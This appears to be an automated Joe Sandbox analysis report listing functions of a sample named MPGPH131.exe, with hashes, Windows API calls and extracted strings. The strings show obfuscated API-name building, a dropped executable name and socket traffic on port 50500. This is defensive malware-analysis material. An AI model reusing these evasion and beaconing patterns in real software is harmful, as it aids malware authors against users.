Opcode ID: 055f89fcbf9ca259ca5448822265f3d12304b82d7286e48af308dcd21b1e024b
Instruction ID: daa32e71712766b3de9640baf24465b9050d8dad48f228090f175965fddd81bc
Opcode Fuzzy Hash: 055f89fcbf9ca259ca5448822265f3d12304b82d7286e48af308dcd21b1e024b
Instruction Fuzzy Hash: 3B9116709002089FDB18CFA8DC89BAEBFB6FF45314F14825DE404AB792D774AA84D791

Function 00573A90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00573C0F

Part of subcall function 0064E96B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,0064B17A,?,006A09CC,00000000,?,00000000,-006A65B0), ref: 0064E9CB

Strings

ios_base::failbit set, xrefs: 00573AC8
ios_base::badbit set, xrefs: 00573BA7, 00573BD2, 00573BF3

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3109751735-1240500531
Opcode ID: e58c1d961fee7ac21f141663b8c44451a8bb7e981d07e12a3aced7b5ee629868
Instruction ID: c8043547520b72f85efa22c8b1e067a8f09e83ca2d5cc74fb0b1df1e2a57f2dd
Opcode Fuzzy Hash: e58c1d961fee7ac21f141663b8c44451a8bb7e981d07e12a3aced7b5ee629868
Instruction Fuzzy Hash: 9841F4B1910204ABC704DF68DC45BAAFBB9FF45320F14C21EF91C9B681E770AA40DBA1

Function 00576330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

Part of subcall function 0064E96B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,0064B17A,?,006A09CC,00000000,?,00000000,-006A65B0), ref: 0064E9CB

___std_fs_directory_iterator_open@12.LIBCPMT ref: 0057644F
___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0057646A

Strings

exists, xrefs: 00576366

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_fs_directory_iterator_advance@8___std_fs_directory_iterator_open@12
String ID: exists
API String ID: 1297148070-2996790960
Opcode ID: c43037f33be3b9858c81d9d278a7d8af6f11dd7e7b8b24d4e45428df7deef711
Instruction ID: b4c556fd099329a27958afa6282edcfba7e9ccc4cf8f1af42ebec8bbe268ecf3
Opcode Fuzzy Hash: c43037f33be3b9858c81d9d278a7d8af6f11dd7e7b8b24d4e45428df7deef711
Instruction Fuzzy Hash: 5641F372900604ABCF10DF59DD85BAAFBB9FB44720F048269EC18A3781EB356D14DBE1

Function 005E45C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 005E4E29
___std_exception_destroy.LIBVCRUNTIME ref: 005E4E42
___std_exception_destroy.LIBVCRUNTIME ref: 005E594D
___std_exception_destroy.LIBVCRUNTIME ref: 005E5966

Strings

value, xrefs: 005E5873

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 7f0ec6ac63b1e714348d93ce5ea9fcbb2f263dd01ba6f74fa7aaaf9d2f4caf81
Instruction ID: 9c57c5b074271b6f6070b71f4fb255c1ef998c92ed2daac337d17cfb051f85f3
Opcode Fuzzy Hash: 7f0ec6ac63b1e714348d93ce5ea9fcbb2f263dd01ba6f74fa7aaaf9d2f4caf81
Instruction Fuzzy Hash: CE51A070C00298DBDB18DFA4CC99BDEBFB5BF15314F148259E445AB382D7746A88CB52

Function 005E99A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 005E99F1

Strings

type must be string, but is , xrefs: 005E9A58
type must be boolean, but is , xrefs: 005E9AE2

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: type must be boolean, but is $type must be string, but is
API String ID: 118556049-436076039
Opcode ID: a4e4e0ca4b003bf21016009504091f0b8d08f472adc34043ede6c8375d69f1f7
Instruction ID: ef2bd2446b03d87dde9322ec38de9630bd514c597b0317076d13db0be612664f
Opcode Fuzzy Hash: a4e4e0ca4b003bf21016009504091f0b8d08f472adc34043ede6c8375d69f1f7
Instruction Fuzzy Hash: 2F3160B19041489FC718EBA4D846BAE7BA9FF45300F10417AF419D77C2EB35AE04C792

Analysis Process: MPGPH131.exePID: 3692, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	1.2%
Signature Coverage:	0%
Total number of Nodes:	324
Total number of Limit Nodes:	19

Executed Functions

Function 0109A044 Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 171
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0109A223

Strings

Kern, xrefs: 0109A0F4
odul, xrefs: 0109A22D
el32, xrefs: 0109A0FB
WinE, xrefs: 0109A110
Writ, xrefs: 0109A148
catA, xrefs: 0109A1AF
jHYZko.exe, xrefs: 0109A1FD, 0109A200
athA, xrefs: 0109A199
Crea, xrefs: 0109A169
dleA, xrefs: 0109A0D0
GetM, xrefs: 0109A0B6
.dll, xrefs: 0109A102
GetT, xrefs: 0109A188
Clos, xrefs: 0109A129
lstr, xrefs: 0109A1A7

Memory Dump Source

Source File: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$jHYZko.exe$lstr$odul
API String ID: 823142352-2918638317
Opcode ID: b0741232f62294ee7c76ea7234fdb84e32d0b0c94cc463ad72419914e2c9c994
Instruction ID: d3f3f8a63ac02c8ff0457c9edaca4e9d9848a01bee70ee05101bcf4be828cf60
Opcode Fuzzy Hash: b0741232f62294ee7c76ea7234fdb84e32d0b0c94cc463ad72419914e2c9c994
Instruction Fuzzy Hash: 2D6160B4E01215DFCF65CF98C8A4AADFBF0BF48355F1482AAD585AB211C3309A81DF91

Function 0058EC20 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 260
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

setsockopt.WS2_32(00000304,0000FFFF,00001006,?,00000008), ref: 0058ECC6
recv.WS2_32(?,00000004,00000002), ref: 0058ECE1
WSAGetLastError.WS2_32 ref: 0058ECE5
recv.WS2_32(00000000,0000000C,00000002,0000000C), ref: 0058ED4E
recv.WS2_32(00000000,0000000C,00000008), ref: 0058ED6F
setsockopt.WS2_32(0000FFFF,00001006,?,00000008,?), ref: 0058EDEB
recv.WS2_32(00000000,?,00000008), ref: 0058EE0C

Part of subcall function 0058DB60: WSAStartup.WS2_32 ref: 0058DB8A
Part of subcall function 0058DB60: getaddrinfo.WS2_32(?,?,?,50500), ref: 0058DC0C
Part of subcall function 0058DB60: socket.WS2_32(?,?,?), ref: 0058DC2D
Part of subcall function 0058DB60: connect.WS2_32(00000000,?,?), ref: 0058DC41
Part of subcall function 0058DB60: closesocket.WS2_32(00000000), ref: 0058DC4D
Part of subcall function 0058DB60: FreeAddrInfoW.WS2_32(?), ref: 0058DC5A
Part of subcall function 0058DB60: WSACleanup.WS2_32 ref: 0058DC60

recv.WS2_32(?,00000004,00000008), ref: 0058F033
Sleep.KERNELBASE(00000001), ref: 0058F09E
Sleep.KERNELBASE(00000064), ref: 0058F0AC
__Mtx_unlock.LIBCPMT ref: 0058F211

Strings

50500, xrefs: 0058EC75

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: recv$Sleepsetsockopt$AddrCleanupErrorFreeInfoLastMtx_unlockStartupclosesocketconnectgetaddrinfosocket
String ID: 50500
API String ID: 1335176318-2230786414
Opcode ID: 7a95452be8162fa7045812c26332ed3c760b804d3ef82751955d1b3e08b761e2
Instruction ID: e815da0b8745a4523305507f403edeecbc16e5074be9bf3367977a054ed3e852
Opcode Fuzzy Hash: 7a95452be8162fa7045812c26332ed3c760b804d3ef82751955d1b3e08b761e2
Instruction Fuzzy Hash: 88B1BF31D00259DFEB24EBA8CC45BADBBB6FB45310F248219E945AB292D770A985CF50

Function 0058DB60 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 92
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 0058DB8A
getaddrinfo.WS2_32(?,?,?,50500), ref: 0058DC0C
socket.WS2_32(?,?,?), ref: 0058DC2D
connect.WS2_32(00000000,?,?), ref: 0058DC41
closesocket.WS2_32(00000000), ref: 0058DC4D
FreeAddrInfoW.WS2_32(?), ref: 0058DC5A
WSACleanup.WS2_32 ref: 0058DC60
FreeAddrInfoW.WS2_32(?), ref: 0058DC75

Strings

50500, xrefs: 0058DBE8

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: AddrFreeInfo$CleanupStartupclosesocketconnectgetaddrinfosocket
String ID: 50500
API String ID: 448659506-2230786414
Opcode ID: 71c2dfe965736fb8724f25d7adb44225312b6f1d8b3fa28f41d294ecadd26a87
Instruction ID: a52701d7bfc6585b2b9b6cbe7c7c4f636c4e0ae16b54ff5062cd3c14212df4c3
Opcode Fuzzy Hash: 71c2dfe965736fb8724f25d7adb44225312b6f1d8b3fa28f41d294ecadd26a87
Instruction Fuzzy Hash: 533180725047049BD7209F28EC48A2ABBF5FB89734F04471DF8A9A22E0D3719D448BA2

Function 0058E060 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 332
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(Ws2_32.dll,?,?,?,?,006747E8,00000000,00000000,-006A65B0), ref: 0058E386
GetProcAddress.KERNEL32(00000000,89988B80), ref: 0058E391
WSASend.WS2_32(?,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,006747E8,00000000,00000000,-006A65B0), ref: 0058E3A6

Strings

50500, xrefs: 0058EC75
131, xrefs: 0058F2C8
Ws2_32.dll, xrefs: 0058E37D

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcSend
String ID: 131$50500$Ws2_32.dll
API String ID: 2819740048-3512819870
Opcode ID: 79abfe181a1b7f47e359e24d0f1e7fe03b7a4d0757b7eb4621063c4ec8951961
Instruction ID: 773a88c789b21797d8cd8a8a6ca378d48c499a15bb34424cad8719558783aeba
Opcode Fuzzy Hash: 79abfe181a1b7f47e359e24d0f1e7fe03b7a4d0757b7eb4621063c4ec8951961
Instruction Fuzzy Hash: 04D1DF30A04248DFDB14DFA8CC55BADBFB5BF46310F684258D855BB292EB709886CB91

Function 00662F0C Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00662622: GetConsoleOutputCP.KERNEL32(FADDE7BB,00000000,00000000,?), ref: 00662685

WriteFile.KERNELBASE(?,00000000,00656AF7,?,00000000,00000000,00000000,?,00000000,?,0064C023,00656AF7,00000000,0064C023,?,?), ref: 00663091
GetLastError.KERNEL32(?,00656AF7,00000000,?,0064C023,?,00000000,00000000), ref: 0066309B

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: 27c8a632ea7d98b2da3662cb89c9c5c226481453b3700f3a444dd9015b3e9162
Instruction ID: 5b5f11e3b0590da269495c1a731a8f18ceba35c0f1e33cc677a4cf5ed1ee4aff
Opcode Fuzzy Hash: 27c8a632ea7d98b2da3662cb89c9c5c226481453b3700f3a444dd9015b3e9162
Instruction Fuzzy Hash: 9661C671D0411AAFDF11DFA8C844AEEBBBABF19304F140149E904AB352D772DA55DB60

Function 00662582 Relevance: 3.1, APIs: 2, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00662469,00000000,CF830579,006A1148,0000000C,00662525,0065662D,?), ref: 006625D8
GetLastError.KERNEL32(?,00662469,00000000,CF830579,006A1148,0000000C,00662525,0065662D,?), ref: 006625E2

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: ac139754206ef6a4f04e01a0d79e839cece2d15668b25600798fdd21571bf296
Instruction ID: 8e4e21666f555b46426f551e16525f4de65adcc631d7b759068d580670940aa6
Opcode Fuzzy Hash: ac139754206ef6a4f04e01a0d79e839cece2d15668b25600798fdd21571bf296
Instruction Fuzzy Hash: C2116B336005515BC73463749C797BD674B9B87734F24030DFD0A8B2D2DE7198C28256

Function 0065BACC Relevance: 3.1, APIs: 2, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,006A0E00,0064C023,00000002,0064C023,00000000,?,?,?,0065BBD6,00000000,?,0064C023,00000002,006A0E00), ref: 0065BB08
GetLastError.KERNEL32(0064C023,?,?,?,0065BBD6,00000000,?,0064C023,00000002,006A0E00,00000000,0064C023,00000000,006A0E00,0000000C,00656BCE), ref: 0065BB15

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4459424895.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: e250e0b9294de1fbebb30158c0191d8da4f10ea1f4cb8114ed21abc28b3e9f32
Instruction ID: 23aa52e679b98d3520941f79751565a15ca390d55e27bdc0cdd5aea59c04b9d7
Opcode Fuzzy Hash: e250e0b9294de1fbebb30158c0191d8da4f10ea1f4cb8114ed21abc28b3e9f32
Instruction Fuzzy Hash: 0101C436610155AFCB09CF69DC45DEE7B2BEB85331F240208FC119B291EBB1EE918B90

Function 005DBA20 Relevance: 1.6, APIs: 1, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 005DBB71

Memory Dump Source

Source File: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000008.00000002.4457341645.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457520263.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457866140.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4457918571.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
